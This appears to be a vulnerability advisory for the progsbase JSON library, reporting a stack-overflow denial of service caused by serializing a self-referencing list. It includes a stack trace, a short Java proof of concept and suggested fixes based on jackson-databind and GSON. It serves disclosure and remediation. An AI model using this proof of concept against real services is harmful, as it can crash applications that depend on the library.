Stack overflow error caused by progsbase serialization List

[PoppingSnack]

Stack overflow error caused by progsbase serialization List

Description

progsbase before v0.4.0 was discovered to contain a stack overflow via the List parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

Error Log

Exception in thread "main" java.lang.StackOverflowError
	at JSON.json.json.CreateArrayElement(json.java:47)
	at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONArrayList(JSONObjectWriter.java:118)
	at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONValue(JSONObjectWriter.java:70)
	at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONArrayList(JSONObjectWriter.java:122)
	at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONValue(JSONObjectWriter.java:70)
	at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONArrayList(JSONObjectWriter.java:122)
	at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONValue(JSONObjectWriter.java:70)
	at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONArrayList(JSONObjectWriter.java:122)
	at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONValue(JSONObjectWriter.java:70)
	at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONArrayList(JSONObjectWriter.java:122)
	at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONValue(JSONObjectWriter.java:70)
	at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONArrayList(JSONObjectWriter.java:122)
	at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONValue(JSONObjectWriter.java:70)
	at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONArrayList(JSONObjectWriter.java:122)
	at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONValue(JSONObjectWriter.java:70)
	at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONArrayList(JSONObjectWriter.java:122)
	at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONValue(JSONObjectWriter.java:70)
	at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONArrayList(JSONObjectWriter.java:122)
	at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONValue(JSONObjectWriter.java:70)
	at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONArrayList(JSONObjectWriter.java:122)
	at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONValue(JSONObjectWriter.java:70)
	at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONArrayList(JSONObjectWriter.java:122)

PoC

        <dependency>
            <groupId>com.progsbase.libraries</groupId>
            <artifactId>JSON</artifactId>
            <version>0.4.0</version>
        </dependency>

import com.progsbase.libraries.JSON.JSONObjectWriter;

import java.util.ArrayList;

public class PoC3 {

    public static void main(String[] args) {
        ArrayList<Object> list = new ArrayList<>();
        list.add(list);
        JSONObjectWriter.writeJSON(list);
    }
}

Rectification Solution

1. Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)

2. Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

References

1. If the value in map is the map's self, the new new JSONObject(map) cause StackOverflowError which may lead to dos jettison-json/jettison#52
2. https://github.com/jettison-json/jettison/pull/53/files